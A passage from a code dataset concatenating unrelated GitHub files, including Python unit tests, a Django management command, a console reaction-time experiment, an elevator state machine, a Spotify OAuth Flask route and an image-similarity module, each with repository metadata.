wait(prompt=\"\"):\r\n print(prompt)\r\n input(\"PRESS ANY KEY TO CONTINUE...\\n\")\r\n\r\npath = \"LyricsText\"\r\n\r\n# pattern = \"([0-9a-z]+ ){1,6}[a-z]+\"\r\n# for filename in os.listdir(path):\r\n# SongName = filename[:-4]\r\n# if re.fullmatch(pattern,SongName):\r\n# SongName=SongName.replace(\" \",\"_\")\r\n# dst = f\"{path}/{SongName}.txt\"\r\n# src = f\"{path}/{filename}\"\r\n# os.rename(src,dst)\r\n\r\n\r\n\r\n# # 15 seconds of 
fame.txt\r\nwith open(\"LyricsTextClear/15_seconds_of_fame.txt\",\"r\") as fread:\r\n a = fread.read()\r\n print(type(a))","repo_name":"iasonpap/LyricsToAudioAlignment","sub_path":"DAMP_Dataset/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30252341254","text":"# -*- encoding:utf-8 -*-\n\n\"\"\"\nTests for the answer evaluation module\n\"\"\"\n\nimport unittest\nfrom quiz.answer_evaluation import *\n\n\"\"\"\nTo run the tests: python tests.py\n\"\"\"\n\nclass TestSingleChoiceAnswer(unittest.TestCase):\n\n def setUp(self):\n self.ae = AnswerEvaluation.factory(AnswerEvaluation.SINGLE_CHOICE)\n\n def test_without_infelicity(self):\n self.assertEqual(self.ae.estimate(u'инкапсуляция', u'Инкапсуляция'), 1)\n self.assertEqual(self.ae.estimate(u'палиморфизм', u'Полиморфизм'), 0)\n\n def test_with_infelicity(self):\n self.assertEqual(\n self.ae.estimate(u'Инкапсу', u'Инкапсуляция'), 0)\n self.assertGreaterEqual(\n self.ae.estimate(u'Инкапсу', u'Инкапсуляция', 0.45), 0.5)\n self.assertGreaterEqual(\n self.ae.estimate(u'Енкапселция', u'Инкапсуляция', 0.3), 0.8)\n self.assertGreaterEqual(\n self.ae.estimate(u'Палиморфизм', u'Полиморфизм', 0.2), 0.9)\n self.assertGreaterEqual(\n self.ae.estimate(u'Наслiдуване', u'Наследование', 0.3), 0.75)\n self.assertLessEqual(\n self.ae.estimate(u\"успадкування\", u\"Наследование\", 0.9), 0.5)\n\n\nclass TestMultipleChoiceAnswer(unittest.TestCase):\n\n def setUp(self):\n self.ae = AnswerEvaluation.factory(AnswerEvaluation.MULTIPLE_CHOICE)\n self.ref_answers = [u'инкапсуляция', u'полиморфизм', u'наследование']\n\n self.answer1 = [u'инкапсуляция', u'полиморфизм', u'наследование']\n self.answer2 = [u'палиморфзм', u'наследавание']\n self.answer3 = [u'палиморфзм', u'наследавание', u'инкапсуляция']\n self.answer4 = [u'палиморфзм']\n\n def test_without_infelicity(self):\n self.assertEqual(self.ae.estimate( self.answer1,\n {'answers': self.ref_answers}, 0.6), 1)\n\n self.assertEqual(self.ae.estimate(self.answer2,\n {'answers': self.ref_answers}, 0.6), 0)\n\n self.assertEqual(self.ae.estimate(self.answer3,\n {'answers': self.ref_answers}, 0.6), 1)\n\n\n def test_with_infelicity(self):\n self.assertEqual(self.ae.estimate(self.answer2,\n {'answers': self.ref_answers,\n 'infelicity': 2}, 0.6), 0.67)\n self.assertEqual(self.ae.estimate(self.answer4,\n {'answers': self.ref_answers,\n 'infelicity': 2}, 0.6), 0)\n self.assertEqual(self.ae.estimate(self.answer4,\n {'answers': self.ref_answers,\n 'infelicity': 1}, 0.6), 0.33)\n\n\nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"icefairy64/TensorHRTotallyNotABot","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69797293608","text":"#\n# >>> Write the mapper code from this point on <<<\n#\nimport sys\n\n\nfor row in sys.stdin:\n elementos = row.split(\",\")\n \n cantidad = elementos[4]\n purpose = elementos[3]\n linea = purpose + \";\" + cantidad\n sys.stdout.write(linea+\"\\n\")","repo_name":"analitica-de-grandes-datos/mapreduce-en-python-johnma96","sub_path":"pregunta_02/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17399362438","text":"import setuptools\n\nwith open('README.md', 'r') as f:\n readme 
= f.read()\n\nwith open('requirements.txt', 'r') as f:\n install_requires = f.readlines()\n\ntest_requires = [\n 'fakeredis==1.0.5',\n]\n\nsetuptools.setup(\n name='challenge_w3',\n version='1.0.0',\n author='Mario Apra',\n author_email='mariotapra@gmail.com',\n url='https://github.com/derrix060/challange-w3',\n description='A simple REST API created on the w3 challenge.',\n license='Apache-2.0',\n long_description=readme,\n packages=setuptools.find_packages(exclude=[\"*.tests\", \"*.tests.*\", \"tests.*\", \"tests\"]),\n include_package_data=True,\n package_dir={'challenge_w3': 'challenge_w3'},\n install_requires=install_requires,\n tests_require=test_requires,\n zip_safe=False,\n entry_points={\n 'console_scripts': [\n 'challenge_w3 = challenge_w3.api:main',\n ],\n 'gui_scripts': []\n },\n)\n","repo_name":"derrix060/challange-w3","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31520942498","text":"def count_all(iterable):\n dic = {}\n for element in iterable:\n if element in dic:\n dic[element] += 1\n else:\n dic[element] = 1\n return dic\n\n\n# Master\ndef m_count_all(items):\n counters = {}\n for item in items:\n counters[item] = counters.get(item, 0) + 1\n return counters\n#\n\n\nif __name__ == \"__main__\":\n animals = ['cat', 'dog', 'horse', 'cat']\n print(count_all(animals))\n","repo_name":"kotano/myCode","sub_path":"Hexlet/Python/3_dictionaries/count_all.py","file_name":"count_all.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11326187100","text":"from django import forms\nfrom blog.models import Post\n\nclass PostForm(forms.ModelForm):\n\n class Meta:\n model= Post\n fields = ('title','text')\n \n def save_form(self, request, instance, form, change):\n user = request.user \n instance = form.save(commit=False)\n if not change or not instance.author:\n instance.author = user\n instance.modified_by = user\n instance.save()\n form.save_m2m()\n return instance\n","repo_name":"redianmarku/MesoOn","sub_path":"blog/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"} +{"seq_id":"8826189914","text":"from django.db import transaction\nimport logging\nimport uuid\n\nfrom django.core.management.base import BaseCommand\nfrom django.utils import timezone\n\nfrom api.companies.models import Company\nfrom api.documents.models import Document\nfrom api.documents.services.upload_document import UploadDocumentService\nfrom api.funds.models import Fund\nfrom api.documents.models import CompanyDataProtectionPolicyDocument\nfrom api.companies.constants import CONTENT_TYPE_MS_DOC\n\nlogger = logging.getLogger(__name__)\n\n\nclass Command(BaseCommand):\n help = 'Create Interest Statement for Investor'\n\n def handle(self, *args, **options):\n for company in Company.objects.all():\n with open('api/companies/data/data_protection_notice.docx', 'rb') as file:\n\n uploaded_document_info = UploadDocumentService.upload(\n document_data=file,\n content_type=CONTENT_TYPE_MS_DOC\n )\n with transaction.atomic():\n document = Document.objects.create(\n partner_id=uuid.uuid4().hex,\n company=company,\n content_type=uploaded_document_info.content_type,\n title='Sample Data Protection Policy',\n extension=uploaded_document_info.extension,\n 
document_id=uploaded_document_info.document_id,\n document_path=uploaded_document_info.document_path,\n document_type=Document.DocumentType.FUND_DATA_PROTECTION_POLICY,\n file_date=timezone.now().date(),\n access_scope=Document.AccessScopeOptions.COMPANY.value,\n )\n CompanyDataProtectionPolicyDocument.objects.create(\n company=company,\n document=document\n )\n\n\n","repo_name":"tayyabsaleem7756/jobtest","sub_path":"backend/retail_market/api/companies/management/commands/create_company_fund_data_protection_policy.py","file_name":"create_company_fund_data_protection_policy.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70096199528","text":"#!/usr/bin/env python3\r\n\r\n# import time and random module\r\nimport time\r\nimport random\r\n\r\n\r\ndef run_experiment():\r\n \"\"\"\r\n This function is the main entry for the experiment.\r\n It calls and coordinates the other helper functions we will use\r\n for the experiment.\r\n \"\"\"\r\n\r\n # initialize a dictionary to store results in\r\n participant_info = {\r\n \"participantID\": \"\",\r\n \"age\": \"\",\r\n \"sex\": \"\",\r\n \"major\": \"\",\r\n \"reaction_times\": [],\r\n \"stimulus_types\": [],\r\n \"correct\": []\r\n }\r\n\r\n # call helper function collect_info(participant_info)\r\n collect_info(participant_info)\r\n\r\n # Call helper function prepare_stimuli()\r\n # to obtain a list of randomly shuffled stimuli\r\n stimuli = prepare_stimuli()\r\n\r\n # Call helper function present_instructions() to display\r\n # some text explaining the task\r\n present_instructions()\r\n\r\n # Call helper function start_main_loop(participant_info, stimuli)\r\n # to run the experiment!\r\n start_main_loop(participant_info, stimuli)\r\n\r\n # Call helper function save_results(participant_info)\r\n # to save the results from the experiment\r\n save_results(participant_info)\r\n\r\n # Say goodbye to the participant\r\n goodbye()\r\n\r\n\r\ndef start_main_loop(participant_info, stimuli):\r\n \"\"\"\r\n This function starts the experiment and runs\r\n len(stimuli) number of trials. 
As the experiment progresses, the participants'\r\n responses are stored into the responses key of the info dict.\r\n :param participant_info: the participant info dict with filled bio data\r\n :param stimuli: a list of randomly shuffled stimuli\r\n :return: nothing, since responses are stored in participant_info dict\r\n \"\"\"\r\n\r\n # We start the experiment by looping through the list of stimuli\r\n for stimulus in stimuli:\r\n # We obtain a timestamp of when the stimulus was presented\r\n start = time.time()\r\n\r\n # Then, we present the word by simply printing it to the screen\r\n # The \"\\n\" * 50 part simply prints 50 newlines, so that the last stimulus is hidden\r\n # from the screen\r\n print(\"\\n\" * 50, stimulus)\r\n\r\n # After that, we wait for the participant to respond\r\n response = input()\r\n\r\n # Immediately after the response, we calculate the reaction time\r\n # we use the built-in round() function to round the rt to\r\n # 4 decimal places\r\n rt = round(time.time() - start, 4)\r\n # ...we evaluate the response\r\n response_correct = evaluate_response(stimulus, response)\r\n # ...and add all the information to the participant info dict\r\n participant_info['reaction_times'].append(rt)\r\n participant_info['stimulus_types'].append(stimulus)\r\n participant_info['correct'].append(response_correct)\r\n\r\ndef evaluate_response(stimulus, response):\r\n \"\"\"\r\n This function evaluates a response as correct (True) or wrong (False)\r\n :param stimulus: a string (RED, or BLUE)\r\n :param response: the participant's response, should be a \"j\",\r\n if stimulus was RED, and 'f' if stimulus was BLUE\r\n :return: True, if response correct, False, if incorrect\r\n \"\"\"\r\n\r\n if stimulus == \"RED\" and response == \"j\":\r\n return True\r\n elif stimulus == \"BLUE\" and response == \"f\":\r\n return True\r\n else:\r\n # The only two correct responses are exhausted, so if we reach\r\n # this block, then the participant responded incorrectly\r\n return False\r\n\r\n\r\ndef present_instructions():\r\n \"\"\"\r\n This function simply presents the instructions\r\n and waits for the participant to respond with any key.\r\n \"\"\"\r\n\r\n # Prepare text as multi-line string\r\n instructions = \"\"\"\r\n Welcome to our reaction time experiment!\\n\r\n In the following, you are going to see a sequence of words.\\n\r\n The words can be of two types: RED or BLUE.\\n\r\n You are asked to press the following keys followed by ENTER depending\\n\r\n on the word that is presented:\\n\r\n For RED press the 'j'-key\\n\r\n For BLUE press the 'f'-key\\n\r\n It is important that you press the respective key followed by ENTER\\n\r\n as fast as possible!\\n\\n\\n\r\n Press ENTER to start the experiment.\\n\r\n \"\"\"\r\n\r\n # Print on screen and wait for response (collect input with input())\r\n print(instructions)\r\n input()\r\n\r\ndef prepare_stimuli():\r\n \"\"\"\r\n This function initializes a list with 20 randomly shuffled stimuli\r\n for our reaction time experiment. 
The stimuli comprise only two types: RED, BLUE\r\n    Later, these stimuli will be presented in the console window.\r\n    :return: a list with 20 stimuli in a shuffled order.\r\n    \"\"\"\r\n\r\n    # This line initializes a list with 10 'RED' and 10 'BLUE' stimuli\r\n    stimuli = [\"RED\", \"BLUE\"] * 10\r\n\r\n    # shuffle the stimuli\r\n    random.shuffle(stimuli)\r\n\r\n    return stimuli\r\n\r\n\r\ndef collect_info(participant_info):\r\n    \"\"\"\r\n    This function collects demographic data from the participant\r\n    and writes it into the participant_info dictionary\r\n    :param participant_info: a dictionary containing keys with empty value\r\n    :return: nothing, since it modifies the participant_info dict\r\n    \"\"\"\r\n\r\n    # Collect all data sequentially using the input() function\r\n    partID = input(\"Enter a participant ID: \")\r\n    age = input(\"Enter your age: \")\r\n    sex = input(\"Enter your gender (m/w/o): \")\r\n    major = input(\"Enter your subject of study: \")\r\n\r\n    # Store input data in the dictionary\r\n    participant_info['participantID'] = partID\r\n    participant_info['age'] = age\r\n    participant_info['sex'] = sex\r\n    participant_info['major'] = major\r\n\r\ndef goodbye():\r\n    \"\"\"Be nice to the participant and thank her or him for participation.\"\"\"\r\n\r\n    # Define text as a multi-line string\r\n    goodbye_text = \"\"\"\r\n    Thank you for participating in the experiment!\\n\r\n    Please remain seated until all participants are done.\\n\\n\\n\r\n    Enjoy your day!\r\n    \"\"\"\r\n\r\n    # \"Clear screen\" and present text\r\n    print(\"\\n\" * 50, goodbye_text)\r\n\r\n\r\ndef save_results(participant_info):\r\n    \"\"\"\r\n    This function saves the participant info to disk.\r\n    :param participant_info: the full dictionary\r\n    :return: None\r\n    \"\"\"\r\n\r\n    # Construct a filename from ID and age\r\n    file_name = participant_info[\"participantID\"] + \"_\" + \\\r\n        str(participant_info['age']) + \".txt\"\r\n\r\n    # Open the file as we already learned\r\n    with open(file_name, \"w\") as outfile:\r\n\r\n\r\n        # write the dict to file_name\r\n        # convert it to a string to be able to write to a .txt file\r\n        outfile.write(str(participant_info))\r\n\r\nif __name__ == \"__main__\":\r\n    run_experiment()\r\n","repo_name":"imarevic/psy_python_course","sub_path":"notebooks/Chapter5/rtexperiment.py","file_name":"rtexperiment.py","file_ext":"py","file_size_in_byte":6698,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"7155635356","text":"import os\nimport requests\nimport base64\nfrom app import app, db\nfrom flask import render_template, request, redirect, session\nfrom flask_session import Session\n# Ignores broken pipe warning\n\nfrom helpers import apology, login_required\nfrom models import SpotifyUser, Artist\nfrom concertlogic import *\nfrom tempfile import mkdtemp\nimport config\n\n# from flask_login import login_required, current_user\ntry:\n    # Python 3\n    from urllib.parse import urlparse, parse_qs\nexcept ImportError:\n    # Python 2\n    from urlparse import urlparse, parse_qs\n\napp.config[\"SECRET_KEY\"] = os.urandom(24)\napp.config['SESSION_TYPE'] = 'filesystem'\n\n# Ensure templates are auto-reloaded\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\napp.config[\"SESSION_FILE_DIR\"] = mkdtemp()\napp.config[\"SESSION_PERMANENT\"] = False\n\nSEATGEEK_CLIENT_ID = os.environ['SEATGEEK_CLIENT_ID']\nSEATGEEK_SECRET = os.environ['SEATGEEK_SECRET']\nSEATGEEK_URL = os.environ['SEATGEEK_URL']\n\nSPOTIFY_CLIENT_ID =
os.environ['SPOTIFY_CLIENT_ID']\nSPOTIFY_CLIENT_SECRET = os.environ['SPOTIFY_SECRET']\nSPOTIFY_URL = os.environ['SPOTIFY_API_URL']\n\nSession(app)\n\nuser_access_token = None\nuser = None\n\n# Ensure responses aren't cached\n@app.after_request\ndef after_request(response):\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n\n@app.template_filter('strftime')\ndef _jinja2_filter_datetime(date, fmt=None):\n date = dateutil.parser.parse(date)\n native = date.replace(tzinfo=None)\n format='%b %d, %Y'\n return native.strftime(format)\n\n@app.route('/')\n@app.route('/index')\ndef index():\n if user_access_token and user:\n # Find concerts\n # events = concerts(user)\n return render_template('index.html')\n else:\n return redirect('/login')\n\n@app.route('/login')\ndef login():\n return render_template('login.html', cid=SPOTIFY_CLIENT_ID, ac=user_access_token, message=\"Welcome! Please log in.\")\n\n@app.route('/logout')\ndef logout():\n user_access_token = None\n # session.clear()\n return render_template('login.html', cid=SPOTIFY_CLIENT_ID, ac=None, message=\"You have been logged out.\")\n\n@app.route('/callback/')\ndef callback():\n url = request.url\n # Converts url into a query object and extracts auth code\n query = parse_qs(urlparse(url).query)\n if 'code' in query:\n global user_access_token, user\n code = query['code']\n # Construct post request to retrieve access token\n data = {'grant_type':'authorization_code',\n 'code': code,\n 'redirect_uri': request.base_url,\n 'client_id': SPOTIFY_CLIENT_ID,\n 'client_secret': SPOTIFY_CLIENT_SECRET}\n\n response = requests.post('https://accounts.spotify.com/api/token', data=data)\n response = response.json()\n # print(response)\n\n user = get_user_obj(response[\"access_token\"])\n\n user_access_token = user['id']\n\n # ADD USER TO DB\n print('begin')\n spotify_user_id = user['id']\n spotify_access_token = response[\"access_token\"]\n # facebook_user_id = request.args.get('facebook_user_id')\n\n if not SpotifyUser.query.filter_by(spotify_user_id=spotify_user_id).count():\n db.session.add(SpotifyUser(spotify_user_id=spotify_user_id, spotify_access_token=spotify_access_token))\n db.session.commit()\n user = SpotifyUser.query.filter_by(spotify_user_id=spotify_user_id).first()\n update_relations(user)\n\n return redirect('/index')\n\n else:\n return apology('Error in authorization', 403)\n\ndef get_user_obj(token):\n response = requests.get('https://api.spotify.com/v1/me', headers={'Authorization': 'Bearer ' + token})\n response = response.json()\n\n return response\n","repo_name":"sf-18/concertmatcher","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32409159042","text":"\"\"\"\nText form module.\n\"\"\"\nfrom wtforms import Form, TextField, SelectField, SubmitField\nfrom wtforms.validators import Required, Length\n\n\nclass TextForm(Form):\n \"\"\"\n Text form class.\n \"\"\"\n start_word = TextField(\n u'start_with',\n validators=[\n Required(u'Required'),\n Length(min=1, max=10, message=u'up to 10'),\n ],\n render_kw={\"placeholder\": u\"e.g. 
今日\"},\n )\n\n word_num = SelectField(\n u'word_num',\n coerce=str,\n choices=[(str(i), str(i)) for i in range(5, 21, 5)],\n )\n\n submit = SubmitField(\n u'Make a sentence',\n render_kw={\"class\": \"pure-button pure-button-primary\"}\n )\n","repo_name":"tsubasaogawa/virtual-ogawa","sub_path":"text_form.py","file_name":"text_form.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73388887849","text":"import time\n\n\nclass MaxErrorWeight(Exception):\n pass # print(\"Error, incorrect weight\")\n\n\nclass MinErrorWeight(Exception):\n pass # print(\"Error, incorrect weight\")\n\n\nclass ElevatorState:\n # weight = 0\n\n def __init__(self, elevator):\n self.elevator = elevator\n\n def get_state(self):\n raise NotImplementedError\n # def enter(self, weight): # писал это сначала, но сейчас не требуется (вроде)\n # pass\n #\n # def exit(self, weight):\n # pass\n #\n # def go_up(self):\n # pass\n #\n # def go_down(self):\n # pass\n\n\nclass EmptyState(ElevatorState):\n\n def enter(self, weight):\n # try:\n self.elevator.current_weight = weight\n if self.elevator.current_weight > self.elevator.max_weight:\n raise MaxErrorWeight\n elif self.elevator.current_weight < self.elevator.min_weight:\n print(\"Лифт пуст\")\n self.elevator.state = EmptyState(self.elevator)\n raise MinErrorWeight\n else:\n self.elevator.state = OccupiedState(self.elevator)\n\n # except MaxErrorWeight:\n # print(\"Перевес! Попробуйте ещё раз\")\n #\n #\n # except MinErrorWeight:\n # print(\"Недостаточный вес!\")\n\n def exit(self, weight):\n if self.elevator.current_weight - weight < 0:\n raise MinErrorWeight\n else:\n self.elevator.current_weight -= weight\n print(\"Лифт пуст\")\n\n def go_up(self):\n self.elevator.state = EmptyState(\n self.elevator) # print(\"Лифт на самом высоком этаже\") # зачем в эмти стайт это?\n\n def go_down(self):\n self.elevator.state = EmptyState(self.elevator)\n # print(\"Лифт на самом нижнем этаже\") # зачем в эмти стайт это?\n\n def get_state(self):\n return 'Ожидание...'\n\n def go_to_p(self, floor):\n if self.elevator.current_weight == 0:\n self.elevator.state = IncomingState(self.elevator)\n elevator.go_to_p(floor)\n\n\nclass OccupiedState(ElevatorState):\n\n def enter(self, weight):\n self.elevator.current_weight += weight\n # self.weight += weight\n # if self.elevator.current_weight + weight > self.elevator.max_weight:\n # print(\"Перевес!\")\n # self.elevator.state = EmptyState(self.elevator)\n # raise ErrorWeight\n\n # return False\n\n # elif self.elevator.current_weight + weight < self.elevator.min_weight:\n # print(\"Лифт пуст\")\n # self.elevator.state = EmptyState(self.elevator)\n # raise ErrorWeight\n #\n # else:\n # self.elevator.current_weight += weight\n\n def exit(self, weight):\n self.elevator.current_weight -= weight\n if self.elevator.current_weight == 0:\n self.elevator.state = EmptyState(self.elevator)\n\n def go_up(self, floor):\n if self.elevator.min_weight <= self.elevator.current_weight <= self.elevator.max_weight:\n if self.elevator.current_floor == self.elevator.max_floor:\n print(\"Выше некуда\")\n else:\n self.elevator.current_floor += floor - self.elevator.current_floor\n # elif self.enter(elevator.current_weight):\n # self.elevator.current_floor += 1 # ЭТО ЧТО ЗА ТАКОЕ?\n\n def go_down(self, floor):\n if self.elevator.min_weight <= self.elevator.current_weight <= self.elevator.max_weight:\n if self.elevator.current_floor == self.elevator.min_floor:\n print(\"Ниже 
некуда\")\n else:\n self.elevator.current_floor -= self.elevator.current_floor - floor\n\n def get_state(self):\n return \"В пути с пассажиром\"\n\n\nclass IncomingState(ElevatorState):\n\n def go_to_p(self, floor):\n if elevator.min_floor <= floor <= elevator.max_floor:\n if self.elevator.current_floor == floor:\n print(elevator.get_state())\n self.elevator.state = EmptyState(self.elevator)\n\n else:\n time.sleep(0.5)\n self.elevator.current_floor = floor\n print(elevator.get_state())\n self.elevator.state = EmptyState(self.elevator)\n else:\n raise ValueError\n\n def get_state(self):\n return \"На пути к пассажиру\"\n\n\nclass Elevator:\n def __init__(self, min_weight, max_weight, min_floor=0, max_floor=3): # блин лист ['p', '1', '2', '3']\n self.max_weight = max_weight\n self.min_weight = min_weight\n self.min_floor = min_floor\n self.max_floor = max_floor\n self.current_weight = 0\n self.current_floor = 0\n self.state = EmptyState(self)\n\n def enter(self, weight):\n self.state.enter(weight)\n print(\"Текущий вес:\", elevator.current_weight) # он разве не должен в ентер в состоянии вызываться???\n\n def exit(self, weight):\n self.state.exit(weight)\n print(\"Текущий вес:\", elevator.current_weight)\n\n def go_up(self, floor):\n self.state.go_up(floor)\n time.sleep(0.5)\n print(\"Текущий этаж:\", elevator.current_floor)\n\n def go_down(self, floor):\n self.state.go_down(floor)\n time.sleep(0.5)\n print(\"Текущий этаж:\", elevator.current_floor)\n\n def go_to_p(self, floor):\n self.state.go_to_p(floor)\n time.sleep(0.5)\n print(\"Текущий этаж:\", elevator.current_floor)\n\n def get_state(self):\n return self.state.get_state()\n\n\n#######################################################\n\nelevator = Elevator(min_weight=10, max_weight=500)\n\n#####################################################\nprint(elevator.get_state())\nelevator.go_to_p(1)\n#print(elevator.get_state()) # мы не можем перехватить поездку к пассажиру тк мы сразу меняем состояние на ожидание 🤷‍♂️\nelevator.enter(420) # вход тела\nprint(elevator.get_state())\nelevator.go_up(2)\nprint(elevator.get_state())\nelevator.go_up(3)\nelevator.go_up(5)\n\nprint(elevator.get_state())\nelevator.exit(420)\nprint(elevator.get_state())\nelevator.go_to_p(2)\n#print(elevator.get_state())\nelevator.enter(40)\nprint(elevator.get_state())\nelevator.go_down(1)\nprint(elevator.get_state())\n# print(\"Текущий этаж:\", elevator.current_floor) # спускаемся вниз\n\nelevator.exit(40)\n# print(\"Текущий вес:\", elevator.current_weight) # выход тела\nprint(elevator.get_state())\n","repo_name":"hakilfrog/russparti","sub_path":"lab4_elevator/lift_vladick_version.py","file_name":"lift_vladick_version.py","file_ext":"py","file_size_in_byte":6819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"917060047","text":"import random\n\ndef mystery_int():\n random\n if random.random() > 0.5:\n return 2\n\ndef main():\n x = mystery_int()\n print(x)\n\n if x is not None:\n print(x*x)\n\nif __name__ == \"__main__\":\n main()","repo_name":"dingjiachengcn/CodeInPlace2023","sub_path":"nonetypr.py","file_name":"nonetypr.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34676226421","text":"from turtle import Screen, RawTurtle\r\n\r\nscreen = Screen()\r\nturtle = RawTurtle(screen)\r\n\r\n### Traje\r\nturtle.shape(\"turtle\")\r\n\r\n\r\n## Tamaño del punto y color\r\nturtle.dot(5, 
\"green\")\r\nturtle.fd(50)\r\n\r\nturtle.dot(5, \"red\")\r\nturtle.lt(120)## Gira a la izquierda\r\nturtle.fd(100)## Avanza 100\r\n\r\nturtle.dot(5, \"blue\")\r\nturtle.lt(170)\r\nturtle.fd(150)\r\n\r\nturtle.lt(170)\r\n\r\nscreen.mainloop() ## La pantalla espera un evento...\r\n","repo_name":"untxi/ada","sub_path":"Code/Tortuga.py","file_name":"Tortuga.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72271272167","text":"from typing import Optional, Tuple\n\nimport torch\nimport torch.nn as nn\n\nfrom cap.core.box_utils import box_center_to_corner, box_corner_to_center\nfrom cap.registry import OBJECT_REGISTRY\n\n\n@OBJECT_REGISTRY.register\nclass XYWHBBoxDecoder(nn.Module):\n \"\"\"Encode bounding box in XYWH ways (proposed in RCNN).\n\n Args:\n legacy_bbox (:obj:'bool', optional): Whether to represent bbox\n in legacy way. Default is False.\n reg_mean (:obj:'bool', tuple): Mean value to be subtracted from\n bbox regression task in each coordinate.\n reg_std (:obj:'bool', tuple): Standard deviation value to be\n divided from bbox regression task in each coordinate.\n \"\"\"\n\n def __init__(\n self,\n legacy_bbox: Optional[bool] = False,\n reg_mean: Optional[Tuple] = (0.0, 0.0, 0.0, 0.0),\n reg_std: Optional[Tuple] = (1.0, 1.0, 1.0, 1.0),\n ):\n super().__init__()\n\n assert len(reg_mean) == 4 and len(reg_std) == 4\n\n self.register_buffer(\n \"reg_mean\", torch.tensor(reg_mean), persistent=False\n )\n self.register_buffer(\n \"reg_std\", torch.tensor(reg_std), persistent=False\n )\n\n self._legacy_bbox = legacy_bbox\n\n def forward(\n self, boxes: torch.Tensor, boxes_delta: torch.Tensor\n ) -> torch.Tensor:\n\n box_cx, box_cy, box_w, box_h = box_corner_to_center(\n boxes, split=True, legacy_bbox=self._legacy_bbox\n )\n\n boxes_delta = (\n boxes_delta.detach().clone() * self.reg_std + self.reg_mean\n )\n\n dx, dy, dw, dh = torch.split(boxes_delta, 1, dim=-1)\n\n pred_cx = dx * box_w + box_cx\n pred_cy = dy * box_h + box_cy\n pred_w = torch.exp(dw) * box_w\n pred_h = torch.exp(dh) * box_h\n\n pred_boxes = box_center_to_corner(\n torch.cat([pred_cx, pred_cy, pred_w, pred_h], dim=-1),\n legacy_bbox=self._legacy_bbox,\n )\n\n return pred_boxes\n","repo_name":"xingyun-xy/cap","sub_path":"cap/models/base_modules/bbox_decoder.py","file_name":"bbox_decoder.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40098141999","text":"import numpy as np\n\nfrom experiments.experiment_main import names4paper_dict\n\ndata_experiment_name = \"Proceedings\"\n\nnumber_of_cores = 50\n\nk = 1\nalpha = 0.001\n\nmodel_names = list(names4paper_dict.keys())\n\nepsilons2try = np.round(np.logspace(np.log10(0.005), np.log10(0.5), num=10), decimals=3)\nepsilons2try = np.append(epsilons2try, np.round(np.logspace(np.log10(0.5), np.log10(10), num=5), decimals=3))\nepsilons2try = np.sort(np.unique(epsilons2try))\nrepetitions = list(range(10))\n","repo_name":"agussomacal/ConDiPINN","sub_path":"src/experiments/Proceedings/parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16134626765","text":"from ctypes import pointer\nfrom typing import Any, Dict, List, Sequence, Set\n\nfrom tqdm import tqdm\n\nfrom imgsimsearch.abstract_image_provider import AbstractImageProvider\nfrom 
imgsimsearch.graph import Graph\nfrom similiraptor.core import (\n PtrSequence,\n fn_compareSimilarSequences,\n fn_countSimilarPixels,\n image_to_native,\n)\n\nSIM_LIMIT = 85 / 100\nSIMPLE_MAX_PIXEL_DISTANCE = 255 * 3\nTHUMBNAIL_DIMENSION = 32\nTHUMBNAIL_SIZE = (THUMBNAIL_DIMENSION, THUMBNAIL_DIMENSION)\n\n\nclass CppSimilarityComparator:\n __slots__ = (\"max_dst_score\", \"limit\", \"width\", \"height\")\n\n def __init__(self, limit: float, width: int, height: int):\n self.width = width\n self.height = height\n self.limit = limit\n self.max_dst_score = SIMPLE_MAX_PIXEL_DISTANCE * width * height\n\n def are_similar(self, p1: PtrSequence, p2: PtrSequence) -> bool:\n return (\n fn_compareSimilarSequences(\n p1, p2, self.width, self.height, self.max_dst_score\n )\n >= self.limit\n )\n\n\nclass CppSimilarityCounter:\n __slots__ = (\"max_pixel_dst\", \"limit\", \"width\", \"height\")\n\n def __init__(self, limit: float, width: int, height: int):\n self.width = width\n self.height = height\n self.limit = int(width * height * limit)\n self.max_pixel_dst = 3 * 10\n\n def are_similar(self, p1: PtrSequence, p2: PtrSequence) -> bool:\n return (\n fn_countSimilarPixels(p1, p2, self.width, 